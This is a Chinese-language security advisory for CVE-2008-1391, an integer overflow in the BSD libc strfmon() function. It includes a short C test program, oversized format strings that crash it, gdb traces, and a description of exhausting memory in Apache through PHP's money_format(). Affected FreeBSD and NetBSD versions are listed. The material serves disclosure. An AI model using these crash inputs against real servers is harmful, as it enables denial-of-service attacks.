BUGTRAQ ID: 28479
CVE ID:CVE-2008-1391
CNCVE ID:CNCVE-20081391
多个BSD平台'strfmon()'函数处理存在整数溢出,可能以受影响应用程序上下文执行任意代码。失败的尝试可导致拒绝服务。
问题代码类似如下:
#include <monetary.h>
ssize_t
strfmon(char * restrict s, size_t maxsize, const char *
restrict format,
...);
- --- 1. /usr/src/lib/libc/stdlib/strfmon.c -整数溢出
主要问题存在于strfmon()函数中,当以如下方法使用这个函数时:
- ---example-start--
#include <stdio.h>
#include <monetary.h>
int main(int argc, char* argv[]){
char buff[51];
char *bux=buff;
int res;
res=strfmon(bux, 50, argv[1], "0");
return 0;
}
- ---example-end--
并编译,可操作如下格式串:
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
问题如下:
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %99999999999999999999n
Starting program: /cxib/C/pln %99999999999999999999n
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
(gdb)
memmove()会重分配内存。
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %.9999999999n
Starting program: /cxib/C/pln %.9999999999n
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x2814f093 in abort () from /lib/libc.so.7
下个例子是:
cxib# ./pln %#99999999999999999999n
Long execution time. Let's try check this process :
- --------------------------
cxib# ps -aux | grep pln
cxib 1843 89.1 13.2 140320 119588 p2 R+ 4:29PM 0:09.68
./pln %#99999999999999999999n
cxib# ps -aux | grep pln
cxib 1843 94.7 48.4 482336 438236 p2 R+ 4:29PM 1:54.07
./pln %#99999999999999999999n
1 VSZ=140320
2 VSZ=482336
- ----------------------------
pln会分配更多的内存,PHP在money_format()函数中使用strfmon(),当我们在Apache中使用mod_php5,我们可以建立如下利用方法,结果如下:
- ---apache-child-die---
swap_pager: out of swap space
swap_pager_getswapspace(16): failed
Mar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was
killed: out of swap space
- ---apache-child-die---
NetBSD NetBSD 4.0
FreeBSD FreeBSD 6.0 .x
FreeBSD FreeBSD 6.0 -STABLE
FreeBSD FreeBSD 6.0 -RELEASE
FreeBSD FreeBSD 7.0 BETA4
FreeBSD FreeBSD 7.0 -RELENG
FreeBSD FreeBSD 7.0 -PRERELEASE
FreeBSD FreeBSD 7.0
FreeBSD FreeBSD 6.0 -RELEASE-p5
可联系供应商获得补丁信息:
<a href=http://www.netbsd.org/ target=_blank>http://www.netbsd.org/</a>
京公网安备 11010502034610号
暂无评论